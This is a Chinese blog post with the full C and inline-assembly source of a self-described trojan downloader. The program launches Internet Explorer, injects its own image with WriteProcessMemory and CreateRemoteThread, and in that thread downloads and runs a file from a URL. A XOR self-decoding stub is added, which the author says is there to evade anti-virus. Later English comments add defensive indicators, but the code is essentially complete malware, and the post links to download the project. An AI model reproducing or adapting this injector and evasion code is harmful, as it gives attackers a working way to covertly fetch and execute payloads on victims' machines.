一、 打开半年前的一个工程,是利用IE来隐藏进程下载的实例,我想灰鸽子也是类似原理吧!
下面是程序的主要思路:
1.获取程序自身路径,启动IE进程
2.获取到IE进程句柄
3.分配内存
4.获取进程映像的地址
5.得到内存镜像大小
6.确定起始基址和内存映像基址的位置
7.写内存,创建线程,写数据
8.建立远程线程并运行,关闭对象
二、下面是源码,举例下载迅雷而已:
/* VC process-less trojan downloader. By: Kardinal and 寂寞的狼 2009.3.10 */
// Analysis notes (original comments translated to English, reviewer remarks added).
// This is the 2009 sample the post describes: it starts IEXPLORE.EXE, copies its own
// image into that process and runs download() there. Behaviours visible in this listing
// that a sandbox or endpoint sensor can key on: VirtualAllocEx / WriteProcessMemory /
// CreateRemoteThread aimed at another process, UrlDownloadToFileA and ShellExecuteA
// resolved at run time via LoadLibrary/GetProcAddress, a custom linker entry point
// (decrpt) that makes its own code page writable (VirtualProtectEx, PAGE_EXECUTE_READWRITE)
// and rewrites it in an SEH-guarded XOR loop. The URL and file paths below are the
// sample's own values as posted.
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
// Author's note: uncomment these 4 lines to build a ~2 KB file.
//#pragma comment(linker,"/OPT:NOWIN98")
//#pragma comment(linker,"/merge:.data=.text")
//#pragma comment(linker,"/merge:.rdata=.text")
//#pragma comment(linker,"/align:0x200")
// decrpt() is the real entry point; main() is only reached from it.
#pragma comment(linker,"/ENTRY:decrpt")
#pragma comment(linker,"/subsystem:windows")
// Fixed preferred image base; main() later requests this same address in the target.
#pragma comment(linker,"/BASE:0x13150000")
// ShellExecuteA, resolved at run time from shell32.dll.
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,int);
// UrlDownloadToFileA, resolved at run time from urlmon.dll.
DWORD (WINAPI *DOWNFILE)(LPCTSTR,LPCTSTR,LPCTSTR,DWORD,LPCTSTR);
// CreateRemoteThread, resolved at run time from kernel32.dll.
HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
void decrpt();
HANDLE processhandle; // handle passed to the three cross-process calls in main()
DWORD pid;            // PID of the process owning the "IEFrame" window
HINSTANCE hshell,hurlmon,hkernel;// HINSTANCE and HMODULE are used interchangeably here
// Start routine of the remote thread, i.e. this body runs inside the IE process.
// Downloads one file with UrlDownloadToFileA, launches it with ShellExecuteA, then
// calls ExitProcess, which terminates the host (IE) process as well.
void download() {
  hshell = LoadLibrary("Shell32.dll");
  hurlmon = LoadLibrary("urlmon.dll");
  (FARPROC&)SHELLRUN = GetProcAddress(hshell,"ShellExecuteA");
  (FARPROC&)DOWNFILE = GetProcAddress(hurlmon,"UrlDownloadToFileA");
  // Author's note: the file to download is chosen here. For triage, the URL and the
  // drop path on the next two lines are the sample's network and file indicators.
  DOWNFILE(NULL,"http://down.sandai.net/Thunder5.9.5.990.exe","C://xunlei.exe",0,NULL);
  SHELLRUN(0,"open","C://xunlei.exe",NULL,NULL,5);
  ExitProcess(0);
}
// Host-side logic, called from decrpt() after the decode loop. The numbered comments
// follow the step list given in the post.
void main() {
  char iename[MAX_PATH],iepath[MAX_PATH];
  ZeroMemory(iename,sizeof(iename));
  ZeroMemory(iepath,sizeof(iepath));
  // 1. Build the IE path and launch IE. Only the first 3 characters of the Windows
  //    directory (the drive prefix) are kept, then the literal is appended. The literal
  //    looks garbled by the blog's rendering (doubled slashes, repeated drive letter);
  //    it is kept byte-for-byte as posted.
  GetWindowsDirectory(iepath,MAX_PATH);
  strncpy(iename,iepath,3);
  strcat(iename,"C://Program Files//Internet Explorer//IEXPLORE.EXE");
  WinExec(iename,SW_SHOWNORMAL);
  Sleep(500);
  // 2. Locate IE's top-level window by class name "IEFrame" and read its owner PID.
  HWND htemp;
  htemp = FindWindow("IEFrame",NULL);
  GetWindowThreadProcessId(htemp,&pid);
  // 3. Memory allocation (variables used by the steps below).
  HMODULE Module;
  LPVOID NewModule;
  DWORD Size;
  LPDWORD lpimagesize;  // declared as a pointer type but holds the size value itself
  // 4. Base address of this process's own image.
  Module = GetModuleHandle(NULL);
  // 5. Read SizeOfImage out of our own PE headers:
  //    [base+0x3c] is e_lfanew, [NT header+0x50] is OptionalHeader.SizeOfImage.
  _asm {
    push eax;
    push ebx;
    mov ebx,Module;
    mov eax,[ebx+0x3c];
    lea eax,[ebx+eax+0x50];
    mov eax,[eax]
    mov lpimagesize,eax;
    pop ebx;
    pop eax;
  };
  Size=(DWORD)lpimagesize;
  // Request exactly our own base address in the target. The listing performs no
  // relocation, so the copied image is only usable if that range is granted.
  NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  // 6. Copy the whole local image into the target, then start a thread at download()
  //    (the local address, which the matching base makes valid in the target too).
  WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);
  LPTHREAD_START_ROUTINE entrypoint;
  __asm {
    push eax;
    lea eax,download;
    mov entrypoint,eax;
    pop eax
  }
  hkernel=LoadLibrary("KERNEL32.dll");
  (FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
  MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); // create the remote thread and run it
  // 7. Close the handle.
  CloseHandle(processhandle);
  return;
} ;
// Program entry point (see /ENTRY:decrpt above). Self-decoding stub: it saves the bytes
// in [download, decrpt) into a stack buffer, then for each key 1..0xFF XORs the saved
// copy with that key back over the original location and calls main() under SEH.
// If main() faults (presumably because the key was wrong), the empty handler swallows
// the exception and the next key is tried; once main() returns normally, decrpt()
// returns. The range covered is [download, decrpt) only if the compiler keeps the
// functions in source order — TODO confirm against the built binary.
void decrpt() {
  HANDLE myps;
  DWORD oldAttr;
  BYTE shellcode[500]; // saved copy of the code bytes; the copied length is never checked against this size
  ZeroMemory(shellcode,sizeof(shellcode));
  myps=GetCurrentProcess();
  // Make the page holding download() writable so the code can be patched in place.
  ::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
  // First move the original code bytes into the local buffer (ecx = decrpt - download).
  _asm {
    pushad;
    lea esi,download;
    lea edi,shellcode;
    lea ecx,decrpt;
    sub ecx,esi;
    en1:
    lodsb;
    stosb;
    dec ecx;
    jne en1;
    popad;
  };
  // Decode with the current key and copy the result back over download().
  int i;
  for (i=1;i<=0xFF;i++) {
    _asm {
      pushad;
      lea esi,shellcode;
      lea edi,download;
      lea ecx,decrpt;
      sub ecx,edi;
      en2:
      lodsb;
      mov ebx,i;
      xor al,bl;
      stosb;
      dec ecx;
      jne en2;
      popad;
    };
    // Author's comment: this construct exists so that common anti-virus products do
    // not detect the file as a virus. (From a defender's view this is a signature-
    // evasion pattern: self-modifying code plus an exception handler that hides
    // failed decode attempts.)
    __try {
      main();
      return;
    } __except(EXCEPTION_EXECUTE_HANDLER) {
    };
  }
  return;
}
三、工程及源码下载地址:
http://download.csdn.net/source/1546155
http://www.rayfile.com/files/77ea8ad9-80ff-11de-aeb2-0014221b798a/